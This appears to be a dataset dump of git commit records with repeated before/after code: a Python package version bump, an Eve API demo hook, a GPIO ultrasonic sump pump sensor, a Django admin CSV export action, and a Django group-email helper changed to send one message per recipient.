<commit_msg>Add test to __all__ in package, bump version to 0.4.1<commit_after>
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
Add test to __all__ in package, bump version to 0.4.1"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
<commit_before>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.0"
__all__ = ("clean", "pyinstaller", "command")
<commit_msg>Add test to __all__ in package, bump version to 0.4.1<commit_after>"""
distutilazy
-----------
Extra distutils command classes.
:license: MIT, see LICENSE for more details.
"""
__version__ = "0.4.1"
__all__ = ("clean", "command", "pyinstaller", "test")
|
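For reference, __all__ in a package's __init__.py controls what a star-import exposes, so listing 'test' publishes the new submodule. Illustrative usage (assuming the named submodules exist):

from distutilazy import *   # binds clean, command, pyinstaller and test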
698ab729f60bdb1a4b280bf6f93e9faa0e1b63f9
|
run-hooks.py
|
run-hooks.py
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
Prepare for PyCon Belarus 2018
|
Prepare for PyCon Belarus 2018
|
Python
|
bsd-3-clause
|
nicolaiarocci/eve-demo
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
Prepare for PyCon Belarus 2018
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
<commit_msg>Prepare for PyCon Belarus 2018<commit_after>
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
Prepare for PyCon Belarus 2018# -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
<commit_before># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['CODEMOTION'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
<commit_msg>Prepare for PyCon Belarus 2018<commit_after># -*- coding: utf-8 -*-
"""
Eve Demo
~~~~~~~~
    A demonstration of a simple API powered by Eve REST API.
    The live demo is available at eve-demo.herokuapp.com. Please keep in mind
    that it is running on Heroku's free tier using a free MongoHQ
sandbox, which means that the first request to the service will probably
be slow. The database gets a reset every now and then.
:copyright: (c) 2016 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from eve import Eve
def codemotion(endpoint, response):
for document in response['_items']:
document['PYCON BELARUS'] = 'IS SO FREAKING COOL!'
app = Eve()
app.on_fetched_resource += codemotion
if __name__ == '__main__':
app.run()
|
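For readers unfamiliar with Eve's event hooks: callbacks attached to on_fetched_resource receive the endpoint name and the response payload, and may mutate documents in place before serialisation. A minimal sketch of the same pattern (handler name and key are illustrative):

from eve import Eve

def add_banner(endpoint, response):
    for document in response['_items']:
        document['banner'] = 'hello'   # runs after every resource fetch

app = Eve()
app.on_fetched_resource += add_banner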
8d56fe74b373efe2dd3bbaffbde9eddd6fae6da7
|
piot/sensor/sumppump.py
|
piot/sensor/sumppump.py
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
Return distance from sump pump sensor
|
Return distance from sump pump sensor
|
Python
|
mit
|
tnewman/PIoT,tnewman/PIoT,tnewman/PIoT
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
Return distance from sump pump sensor
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
<commit_before>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
<commit_msg>Return distance from sump pump sensor<commit_after>
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
Return distance from sump pump sensorimport time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
<commit_before>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
<commit_msg>Return distance from sump pump sensor<commit_after>import time
from periphery import GPIO
from piot.sensor.base import BaseAnalogSensor
class SumpPump(BaseAnalogSensor):
def __init__(self):
self.min_normal=30
self.max_normal=200
self.unit='cm'
self.error_sentinel=None
def read_analog_sensor(self):
trig=GPIO(23, 'out')
echo=GPIO(24, 'in')
# Pulse to trigger sensor
trig.write(False)
time.sleep(0.00001)
trig.write(True)
time.sleep(0.00001)
trig.write(False)
while echo.read()==False:
pulse_start=time.time()
while echo.read()==True:
pulse_end= time.time()
pulse_duration=pulse_end-pulse_start
        # Quick explanation of the formula:
# The pulse duration is to the object and back, so the
# distance is one half of the pulse duration. The speed of
# sound in air is 340 meters/second. There are 100 centimeters
# in a meter.
distance=pulse_duration*340/2*100
distance=round(distance, 2)
trig.close()
echo.close()
return distance
|
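The distance formula in this sensor deserves a gloss: the echo time covers the round trip, so the one-way distance is duration * 340 / 2 metres (speed of sound taken as 340 m/s), then * 100 for centimetres. A quick worked example (duration illustrative):

pulse_duration = 0.01                     # seconds, round trip
distance_m = pulse_duration * 340 / 2     # 1.7 m one way
distance_cm = distance_m * 100            # 170.0 cm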
3d439d81766f354de9ab257d5ed690efd4aeb508
|
nap/extras/actions.py
|
nap/extras/actions.py
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
Adjust for renamed CSV class
|
Adjust for renamed CSV class
|
Python
|
bsd-3-clause
|
limbera/django-nap,MarkusH/django-nap
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
Adjust for renamed CSV class
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
<commit_before>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
<commit_msg>Adjust for renamed CSV class<commit_after>
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
Adjust for renamed CSV class
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
<commit_before>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
<commit_msg>Adjust for renamed CSV class<commit_after>
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import Writer
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = Writer(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
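The mechanic worth noting in ExportCsv is that StreamingHttpResponse consumes any iterator lazily, so rows are emitted as the queryset is walked instead of being buffered in memory. A stripped-down sketch of the same shape (field names illustrative):

from django.http import StreamingHttpResponse

def export(rows):
    def generate():
        yield 'id,name\r\n'                          # header row first
        for row in rows:
            yield '%s,%s\r\n' % (row.id, row.name)   # one line per object
    response = StreamingHttpResponse(generate(), content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename=export.csv'
    return response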
dc47a724525186fe99d79e62447efc3dbc9d95b0
|
app/groups/utils.py
|
app/groups/utils.py
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
return msg
|
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
Python
|
bsd-3-clause
|
nikdoof/test-auth
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(ctx), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), to_email)
msg.attach_alternative(get_template(email_html_template).render(ctx), 'text/html')
msg.send(fail_silently=True)
Send individual mails, to avoid showing the whole to list, BCC and spamholing from Google
|
from django.conf import settings
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template.loader import get_template
from django.template import Context
from django.contrib.sites.models import Site
def send_group_email(request, to_email, subject, email_text_template, email_html_template):
"""Sends a email to a group of people using a standard layout"""
# Mail the admins to inform them of a new request
ctx = Context({'request': request, 'domain': Site.objects.get_current().domain})
messages = [generate_mail(ctx, email_text_template, email_html_template, to, subject) for to in to_email]
connection = get_connection(fail_silently=True)
connection.send_messages(messages)
def generate_mail(context, email_text_template, email_html_template, to, subject):
msg = EmailMultiAlternatives(subject, get_template(email_text_template).render(context), getattr(settings, 'DEFAULT_FROM_EMAIL', 'auth@pleaseignore.com'), [to])
msg.attach_alternative(get_template(email_html_template).render(context), 'text/html')
